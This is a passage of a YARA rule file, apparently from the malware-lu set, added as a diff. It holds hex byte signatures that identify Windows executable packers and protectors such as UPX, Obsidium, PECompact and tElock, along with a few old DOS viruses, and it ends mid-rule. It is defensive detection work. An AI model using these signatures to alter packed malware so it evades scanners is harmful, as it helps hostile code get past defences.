+rule ANDpakk2006DmitryAndreev
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 FC BE D4 00 40 00 BF 00 10 00 01 57 83 CD FF 33 C9 F9 EB 05 A4 02 DB 75 05 8A 1E 46 12 DB 72 F4 33 C0 40 02 DB 75 05 8A 1E 46 12 DB 13 C0 02 DB 75 05 8A 1E 46 12 DB 72 0E 48 02 DB 75 05 8A 1E 46 12 DB 13 C0 EB DC 83 E8 03 72 0F C1 E0 08 AC 83 F0 FF 74 4D D1 F8 8B E8 EB 09 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 13 C9 75 1A 41 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 73 EA 83 C1 02 81 FD 00 FB FF FF 83 D1 01 56 8D 34 2F F3 A4 5E E9 73 FF FF FF C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule Thinstall2628Jtit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 BB 34 1D 00 00 2B C3 50 68 00 00 40 00 68 00 40 00 00 68 BC 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 }
+	$a1 = { E8 00 00 00 00 58 BB 34 1D 00 00 2B C3 50 68 00 00 40 00 68 00 40 00 00 68 BC 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule UPXModifierv01x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1333ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }
+	$a1 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 27 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PureBasic4xNeilHodgson
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? 00 00 68 00 00 00 00 68 ?? ?? ?? 00 E8 ?? ?? ?? 00 83 C4 0C 68 00 00 00 00 E8 ?? ?? ?? 00 A3 ?? ?? ?? 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 ?? ?? ?? 00 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxAugust16thIronMaiden
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA 79 02 03 D7 B4 1A CD 21 B8 24 35 CD 21 5F 57 89 9D 4E 02 8C 85 50 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtector10Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 E8 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 05 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPACK099
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 80 BD E0 04 00 00 01 0F 84 F2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Freshbindv20gFresh
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 A1 00 00 00 00 55 89 E5 6A FF 68 1C A0 41 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXSCRAMBLER306OnToL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompact2xxBitSumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv01Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+	$a1 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxEddie2100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 4F 4F 0E E8 ?? ?? 47 47 1E FF ?? ?? CB E8 ?? ?? 84 C0 ?? ?? 50 53 56 57 1E 06 B4 51 CD 21 8E C3 ?? ?? ?? ?? ?? ?? ?? 8B F2 B4 2F CD 21 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NETexecutableMicrosoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 5F 43 6F 72 45 78 65 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00 00 00 00 00 FF 25 }
+
+condition:
+		$a0
+}
+	
+	
+rule tElockv098
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AZProtect0001byAlexZakaAZCRC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 70 FC 60 8C 80 4D 11 00 70 25 81 00 40 0D 91 BB 60 8C 80 4D 11 00 70 21 81 1D 61 0D 81 00 40 CE 60 8C 80 4D 11 00 70 25 81 25 81 25 81 25 81 29 61 41 81 31 61 1D 61 00 40 B7 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 BE 00 ?? ?? 00 BF 00 00 40 00 EB 17 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 00 00 00 FF 25 ?? ?? ?? 00 8B C6 03 C7 8B F8 57 55 8B EC 05 7F 00 00 00 50 E8 E5 FF FF FF BA 8C ?? ?? 00 89 02 E9 1A 01 00 00 ?? 00 00 00 47 65 74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 41 00 47 65 74 56 6F 6C 75 6D 65 49 6E 66 6F 72 6D 61 74 69 6F 6E 41 00 4D 65 73 73 61 67 65 42 6F 78 41 00 45 78 69 74 50 72 6F 63 65 73 73 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 }
+	$a1 = { FC 33 C9 49 8B D1 33 C0 33 DB AC 32 C1 8A CD 8A EA 8A D6 B6 08 66 D1 EB 66 D1 D8 73 09 66 35 20 83 66 81 F3 B8 ED FE CE 75 EB 33 C8 33 D3 4F 75 D5 F7 D2 F7 D1 8B C2 C1 C0 10 66 8B C1 C3 F0 DA 55 8B EC 53 56 33 C9 33 DB 8B 4D 0C 8B 55 10 8B 75 08 4E 4A 83 FB 08 72 05 33 DB 43 EB 01 43 33 C0 8A 04 31 8A 24 13 2A C4 88 04 31 E2 E6 5E 5B C9 C2 0C }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule UPX290LZMAMarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }
+	$a1 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule MEW510Northfox
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv090
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 02 00 00 00 E8 00 E8 00 00 00 00 5E 2B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1258ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv132EngPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSplitter12BillPrisonerTPOC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 95 02 00 00 64 A1 00 00 00 00 83 38 FF 74 04 8B 00 EB F7 8B 40 04 C3 55 8B EC B8 00 00 00 00 8B 75 08 81 E6 00 00 FF FF B9 06 00 00 00 56 56 E8 B0 00 00 00 5E 83 F8 01 75 06 8B C6 C9 C2 04 00 81 EE 00 00 01 00 E2 E5 C9 C2 04 00 55 8B EC 8B 75 0C 8B DE 03 76 3C 8D 76 18 8D 76 60 8B 36 03 F3 56 8B 76 20 03 F3 33 D2 8B C6 8B 36 03 F3 8B 7D 08 B9 0E 00 00 00 FC F3 A6 0B C9 75 02 EB 08 }
+
+condition:
+		$a0
+}
+	
+	
+rule COPv10c1988
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? BE ?? ?? B9 ?? ?? AC 32 ?? ?? ?? AA E2 ?? 8B ?? ?? ?? EB ?? 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv25RetailSlimLoaderBitsumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 01 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Morphinev27Holy_FatherRatter29A
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a1 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule diPackerV1XdiProtectorSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0F 00 2D E9 01 00 A0 E3 68 01 00 EB 8C 00 00 EB 2B 00 00 EB 00 00 20 E0 1C 10 8F E2 8E 20 8F E2 00 30 A0 E3 67 01 00 EB 0F 00 BD E8 00 C0 8F E2 00 F0 9C E5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01REALBasicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 90 90 90 90 90 90 90 90 90 90 50 90 90 90 90 90 00 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PPCPROTECT11XAlexeyGorchakov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 5F 2D E9 20 00 9F E5 00 00 90 E5 18 00 8F E5 18 00 9F E5 00 00 90 E5 10 00 8F E5 01 00 A0 E3 00 00 00 EB 02 00 00 EA 04 F0 1F E5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nPackV111502006BetaNEOxuinC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? ?? E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 A1 3C ?? ?? ?? C7 05 40 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 ?? ?? ?? C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtector11X13XSukhovVladimirSergeNMarkin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 00 10 40 00 E8 01 00 00 00 9A 83 C4 10 8B E5 5D E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule HardlockdongleAlladin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5C 5C 2E 5C 48 41 52 44 4C 4F 43 4B 2E 56 58 44 00 00 00 00 5C 5C 2E 5C 46 45 6E 74 65 44 65 76 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 10 F2 40 00 68 74 9D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack_PatchDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 3A 00 00 00 02 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeJoinerV10Yodaf2f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrink071beta
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 AD 54 3A 40 00 FF B5 50 3A 40 00 6A 40 FF 95 88 3A 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMASM32TASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B }
+	$a1 = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev101BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX072
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AdFlt2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 01 9C 0F A0 0F A8 60 FD 6A 00 0F A1 BE ?? ?? AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack120BasicEditionaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 92 05 00 00 EB 0C 8B 85 8E 05 00 00 89 85 92 05 00 00 8D B5 BA 05 00 00 8D 9D 41 04 00 00 33 FF E8 38 01 00 00 EB 1B 8B 85 92 05 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 9E 05 00 00 00 74 0E 83 BD A2 05 00 00 00 74 05 E8 D6 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AsCryptv01SToRM1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 ?? ?? ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? E2 ?? EB }
+
+condition:
+		$a0
+}
+	
+	
+rule SmartEMicrosoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 15 03 00 00 00 ?? 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 8F 07 00 00 89 85 83 07 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 2F 06 00 00 E8 8E 04 00 00 49 0F 88 23 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PE_Admin10EncryptPE12003518SoldFlyingCat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+	$a1 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule MacromediaWindowsFlashProjectorPlayerv40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 44 56 FF 15 24 41 43 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPack32v100v111v112v120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorV11vcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 1A ED 41 00 B9 EC EB 41 00 50 51 E8 74 00 00 00 E8 51 6A 00 00 58 83 E8 10 B9 B3 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MaskPE16yzkzero
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 36 81 2C 24 ?? ?? ?? 00 C3 60 }
+
+condition:
+		$a0
+}
+	
+	
+rule bambam001bedrock
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 14 E8 9A 05 00 00 8B D8 53 68 ?? ?? ?? ?? E8 6C FD FF FF B9 05 00 00 00 8B F3 BF ?? ?? ?? ?? 53 F3 A5 E8 8D 05 00 00 8B 3D ?? ?? ?? ?? A1 ?? ?? ?? ?? 66 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 2B CF 89 45 E8 89 0D ?? ?? ?? ?? 66 89 55 EC 8B 41 3C 33 D2 03 C1 83 C4 10 66 8B 48 06 66 8B 50 14 81 E1 FF FF 00 00 8D 5C 02 18 8D 41 FF 85 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MEW11SE10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01BorlandDelphi6070Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
